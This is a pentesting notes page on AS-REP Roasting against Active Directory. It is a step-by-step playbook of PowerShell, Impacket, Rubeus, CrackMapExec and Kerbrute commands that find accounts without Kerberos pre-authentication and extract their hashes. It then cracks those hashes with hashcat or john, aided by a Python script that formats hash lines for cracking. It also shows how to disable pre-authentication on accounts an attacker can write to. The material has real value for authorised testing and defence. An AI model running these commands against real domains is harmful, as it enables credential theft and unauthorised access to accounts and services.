Pentesting Articles and Notes

AS-REP Roasting

Although rare, you will occasionally find a user account that does not require Kerberos Pre-Authentication (the account's DoesNotRequirePreAuth flag is set).

If you discover users with Pre-Auth disabled you can grab their hashes, crack them offline, and then request tickets if you have the privileges to access particular services.

Steps to AS-REP Roast

Step 1 - Discover AS-REP Roastable Users

  • From Powershell

# PowerView_dev
Get-DomainUser -PreAuthNotRequired -Verbose | select samaccountname

# AD Module
Get-ADUser -Filter {DoesNotRequirePreauth -eq $true} -Properties DoesNotRequirePreAuth | select samaccountname

Step 2 - Grabbing the User Hashes

  • From Powershell

# ASREPRoast.ps1
. .\ASREPRoast.ps1
Get-ASREPHash -UserName VPN403User

# rubeus.exe
.\Rubeus.exe asreproast

# ASREPRoast.ps1
Invoke-ASREPRoast | fl

  • Linux

# Impacket (the target is written as <domain>/; -no-pass with -usersfile avoids a credential prompt)
python GetNPUsers.py <domain>/ -usersfile <userfile> -no-pass -dc-ip <dc_ip> -format hashcat

# Crackmapexec
crackmapexec ldap <ip> -u <user> -p <pass> --asreproast ASREPROAST

# Kerbrute
./kerbrute --dc <ip> -d <domain> userenum <userfile> [--downgrade]

Step 3 - Cracking the Hashes

  • Note: make sure the hash ETYPE is 23 and not 18, otherwise Hashcat cannot crack it with the mode below. Also make sure the 23 actually appears in the hash, as in the example below; some tools omit it and you may have to add it manually before cracking:

'$krb5asrep$23$*ticket*$d0ed768218535536a...'

  • If you used kerbrute, you can use the --downgrade option to obtain the ETYPE 23 hash

# Hashcat (mode 18200 = Kerberos 5 AS-REP, etype 23)
hashcat -m 18200 hashfile.txt rockyou.txt
# or john
john hashfile.txt --wordlist=rockyou.txt
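The note above about the ETYPE and the missing 23 is the usual stumbling block when AS-REP output from different tools is fed to hashcat. The following is an added example (not code from the original page or any of the tools it mentions): it parses the hashcat 18200 line format, inserts the `$23$` field when a tool left it out, and sets aside lines whose etype is not 23. The sample lines and their checksum/ciphertext bytes are constructed.

```python
import re

# Hashcat mode 18200 expects lines of the form
#   $krb5asrep$23$<user>@<REALM>:<32 hex chars checksum>$<hex encrypted AS-REP data>
# Some tool output formats omit the "$23$" etype field; the optional group below accepts both.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:(?P<etype>\d+)\$)?"
    r"(?P<principal>[^:$]+):(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)

def parse_asrep(line):
    """Split an AS-REP hash line into its fields; return None if it is not one."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    etype = int(m.group("etype")) if m.group("etype") else None
    return {"etype": etype, "principal": m.group("principal"),
            "checksum": m.group("checksum").lower(), "edata": m.group("edata").lower()}

def hashcat_mode(etype):
    """Only RC4-HMAC (etype 23) AS-REPs are handled by mode 18200."""
    return 18200 if etype == 23 else None

def normalize_asrep(line, assumed_etype=23):
    """Return a mode-18200 line, inserting "$23$" when the tool left it out."""
    h = parse_asrep(line)
    if h is None:
        raise ValueError("not an AS-REP hash line")
    etype = h["etype"] if h["etype"] is not None else assumed_etype
    if hashcat_mode(etype) is None:
        raise ValueError(f"etype {etype} is not crackable with mode 18200")
    if len(h["checksum"]) != 32:
        raise ValueError("etype 23 checksum must be 16 bytes (32 hex chars)")
    return f"$krb5asrep${etype}${h['principal']}:{h['checksum']}${h['edata']}"

def triage(lines):
    """Sort raw tool output into (normalized crackable lines, skipped lines with reason)."""
    crackable, skipped = [], []
    for line in lines:
        try:
            crackable.append(normalize_asrep(line))
        except ValueError as err:
            skipped.append((line, str(err)))
    return crackable, skipped

# Constructed sample lines (fake checksums and ciphertext), one per output style.
SAMPLE = [
    "$krb5asrep$23$vpn403user@CORP.LOCAL:" + "01" * 16 + "$" + "ab" * 40,  # etype field present
    "$krb5asrep$svc_backup@CORP.LOCAL:" + "fe" * 16 + "$" + "cd" * 40,     # etype field omitted
    "$krb5asrep$18$hardened@CORP.LOCAL:" + "00" * 12 + "$" + "ef" * 40,    # AES, wrong mode
    "not a hash",
]

if __name__ == "__main__":
    ok, bad = triage(SAMPLE)
    print("\n".join(ok))
    for line, why in bad:
        print(f"skipped ({why}): {line[:40]}")
```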

If You Would Like to Disable Preauth on a User

  • This can be useful if you hold write permissions over other user objects.

# Find users you can modify
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<group>"}

# Then disable PreAuth on the user (executing this again will re-enable PreAuth)
Set-DomainObject -Identity <user_to_change> -XOR @{useraccountcontrol=4194304} -Verbose

# Then check if the user PreAuth is now disabled
Get-DomainUser -PreAuthNotRequired -Verbose | select samaccountname

Last updated 3 years ago